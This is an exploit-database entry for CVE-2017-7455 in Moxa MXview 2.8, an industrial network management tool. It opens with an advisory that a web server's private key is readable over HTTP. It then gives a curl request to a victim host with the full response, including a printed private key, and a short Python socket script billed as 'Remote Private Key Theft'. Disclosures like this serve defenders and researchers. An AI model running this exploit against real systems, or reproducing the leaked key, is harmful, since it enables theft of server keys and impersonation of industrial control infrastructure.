Lucene search
Hyp3rlinx1337DAY-ID-27548HistoryApr 10, 2017 - 12:00 a.m.
Moxa MXview v2.8 Remote Private Key Disclosure Exploit
2017-04-1000:00:00
hyp3rlinx
0day.today
42
0.864 High
EPSS
Percentile
98.6%
Exploit for windows platform in category remote exploits
[+] Credits: John Page AKA HYP3RLINX
Vendor:
============
www.moxa.com
Product:
===========
MXview V2.8
Download:
http://www.moxa.com/product/MXstudio.htm
MXview Industrial Network Management Software.
Auto discovery of network devices and physical connections
Event playback for quick troubleshooting
Color-coded VLAN/IGMP groups and other visualized network data
Supports MXview ToGo mobile app for remote monitoring and notificationβanytime, anywhere.
Vulnerability Type:
=============================
Remote Private Key Disclosure
CVE Reference:
==============
CVE-2017-7455
Security Issue:
================
MXview stores a copy of its web servers private key under C:\Users\TARGET-USER\AppData\Roaming\moxa\mxview\web\certs\mxview.key.
Remote attackers can easily access/read this private key "mxview.key" file by making an HTTP GET request.
e.g.
curl -v http://VICTIM-IP:81/certs/mxview.key
* About to connect() to VICTIM-IP port 81
* Trying VICTIM-IP... connected
* Connected to VICTIM-IP (VICTIM-IP) port 81
> GET /certs/mxview.key HTTP/1.1
> User-Agent: curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5
> Host: VICTIM-IP:81
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Tue Feb 28 14:18:00 2017
< Server: GoAhead-Webs
< Last-modified: Tue Feb 28 10:46:51 2017
< Content-length: 916
< Content-type: text/plain
-----BEGIN PRIVATE KEY-----
MIICdwIBADANBgkqhkiG2w0BAQEFAASCAmEwggJdAgEAAoGBAMO2BjHS6rFYqxPb
QCjhVn5+UGwfICfETzk5JQvhkhc71bnsDHI7lVyYhheYLcPQBEglVolwGANPp7LF
2lhG+UaSFfTVk8UDvV0qQpjSQvDjcWSuKBfceyT5zmI8ynxuMHoqBR7ZOSLY31z+
Rxt+JCykwqfMGdjawnC5ivr8iWDpAgMBAAECgYAQpHjwYbQtcpHRtXJGR6s4RHuI
RjlQyGPIRPC+iucGbMMm9Ui1qhVwc1Pry7gQj67dh7dNJqgUGAD1tdd0bEykKoqm
ICgXj0HMPCLxUy4CHIZInsBhzAyp/3atkDIaeELZckCbmttkVvncDi+b9HnuL/To
YwJpuLkpXEKpjK7iAQJBAOof+yliPn7UsBecw/Hc/ixeDRGI1kjtvuOvSi6jLZoj
3rzODMSD1eRcrK/GJydWVT8TV3WXXYn3M1cu3kmQJKkCQQDV/zlBtFFPPVAl1zy7
UBG+RPI63uXeaA0C1+RX2XfJSR4zeKxnWgalzUl0UwMgWB3Gpp2+VW5a/zw3aKlK
6MJBAkBHPMXqWKdVZhfSh3Ojky+PhmqJjE5PUG/FzZ9Pw3zrqsBqSHPgE5Ewc/Zj
YXKmavCbSaJR+GWQxjPL8knWrlJJAkEAkahnEJHrxkO1igw3Ckg0y4yiU+/kBr5M
HONWSXV8U0WxiNdagf6FB9XzaXoXZuyTl+NQ+3yq4MVZ910F3jcQAQJBAI+q0AcX
EskHai2Fx24gkHwwRxacsiXrRClxIj5NB52CSo2Sy6EF02DKQVWR3oIjDesXcWvl
+CPTV6agBkYxe7Q=
-----END PRIVATE KEY-----
Exploit:
=========
import socket
print 'Moxa MXview 2.8 Remote Private Key Theft'
print 'by hyp3rlinx\n'
IP=raw_input("[Moxa MXview IP]> ")
PORT=int(raw_input("[PORT]> "))
STEAL_PRV_KEY="GET /certs/mxview.key HTTP/1.1\r\nHost: "+IP+"\r\n\r\n"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((IP,PORT))
s.send(STEAL_PRV_KEY)
print 'Enjoy ur private server key!\n'
print s.recv(512)
s.close()
# 0day.today [2018-03-13] #Related
cve
cve
CVE-2017-7455
2017-04-14 14:59:00
exploitpack
exploitpack
Moxa MXview 2.8 - Private Key Disclosure
2017-04-10 00:00:00
prion
prion
Improper access control
2017-04-14 14:59:00
nvd
nvd
CVE-2017-7455
2017-04-14 14:59:00
cvelist
cvelist
CVE-2017-7455
2017-04-14 14:00:00
checkpoint_advisories
checkpoint_advisories
Moxa MXView Information Disclosure (CVE-2017-7455)
2022-11-09 00:00:00
packetstorm
packetstorm
Moxa MXview 2.8 Private Key Disclosure
2017-04-10 00:00:00
exploitdb
exploitdb
Moxa MXview 2.8 - Private Key Disclosure
2017-04-10 00:00:00
openvas
openvas
Moxa MXview < 2.9 Multiple Vulnerabilities (HTTP) - Active Check
2017-04-11 00:00:00